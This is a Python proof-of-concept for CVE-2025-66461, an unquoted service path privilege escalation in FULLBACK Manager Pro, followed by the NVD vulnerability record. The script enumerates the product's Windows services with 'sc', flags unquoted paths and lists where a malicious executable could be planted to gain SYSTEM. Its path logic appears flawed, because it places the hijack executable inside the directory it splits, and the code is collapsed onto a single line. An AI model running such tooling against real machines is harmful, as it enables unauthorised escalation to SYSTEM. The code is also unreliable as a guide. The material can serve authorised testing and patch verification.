CVE-2025-66461

#!/usr/bin/env python3 """ CVE-2025-66461 PoC - FULLBACK Manager Pro Unquoted Service Path Author: Security Researcher Description: This PoC demonstrates how to exploit the unquoted service path vulnerability in FULLBACK Manager Pro to escalate privileges to SYSTEM. Note: This code is for educational and authorized testing purposes only. """ import os import sys import subprocess import time def check_service_paths(): """Check for unquoted service paths in FULLBACK Manager Pro services""" print("[*] Enumerating FULLBACK Manager Pro services...") try: result = subprocess.run( ['sc', 'query', 'state=', 'all'], capture_output=True, text=True ) # Search for services containing FULLBACK services = [] for line in result.stdout.split('\n'): if 'FULLBACK' in line.upper(): service_name = line.split(':')[1].strip() services.append(service_name) return services except Exception as e: print(f"[-] Error querying services: {e}") return [] def check_unquoted_path(service_name): """Check if a service has an unquoted executable path""" try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Check if path is unquoted and contains spaces if '"' not in path and ' ' in path: print(f"[+] VULNERABLE: {service_name}") print(f"[+] Unquoted path: {path}") return path else: print(f"[-] Not vulnerable: {service_name}") return None return None except Exception as e: print(f"[-] Error checking service: {e}") return None def exploit_unquoted_path(base_path): """ Exploit the unquoted service path vulnerability This creates a malicious executable in an intermediate directory """ # Parse path to find intermediate directories path_parts = base_path.strip('"').split('\\') executable = path_parts[-1] # Generate potential exploitation points exploit_points = [] current_path = "" for i, part in enumerate(path_parts[:-1]): current_path += part + "\\" # Check if this could be a potential exploit point if ' ' in part and current_path.strip('\\'): exploit_point = current_path + part.split()[0] + ".exe" exploit_points.append({ 'directory': current_path, 'malicious_exe': part.split()[0] + ".exe", 'full_path': exploit_point }) return exploit_points def main(): print("=" * 60) print("CVE-2025-66461 PoC - FULLBACK Manager Pro") print("Unquoted Service Path Privilege Escalation") print("=" * 60) # Step 1: Enumerate services services = check_service_paths() if not services: print("[-] No FULLBACK Manager Pro services found") return # Step 2: Check for unquoted paths vulnerable_services = [] for service in services: path = check_unquoted_path(service) if path: vulnerable_services.append({'service': service, 'path': path}) if not vulnerable_services: print("[-] No vulnerable services found") return # Step 3: Generate exploitation points print("\n[*] Analyzing exploitation points...") for vuln in vulnerable_services: exploit_points = exploit_unquoted_path(vuln['path']) print(f"\n[+] Service: {vuln['service']}") print(f"[+] Original path: {vuln['path']}") print("[+] Potential exploitation points:") for point in exploit_points: print(f" - Create: {point['full_path']}") print(f" In directory: {point['directory']}") print("\n[*] Exploitation requires:") print(" 1. Write permission to intermediate directory") print(" 2. Service restart or system reboot") print(" 3. Malicious executable in exploitation point") print("\n[!] This PoC is for authorized testing only.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66461", "sourceIdentifier": "[email protected]", "published": "2025-12-08T10:16:01.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FULLBACK Manager Pro provided by GS Yuasa International Ltd. registers two Windows services with unquoted file paths. A user may execute arbitrary code with SYSTEM privilege if he/she has the write permission on the path to the directory where the affected product is installed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN59242986/", "source": "[email protected]"}, {"url": "https://ps.gs-yuasa.com/technicalinfo/pdf/failure/FMP_info20251201_TEX48214-993.pdf", "source": "[email protected]"}]}}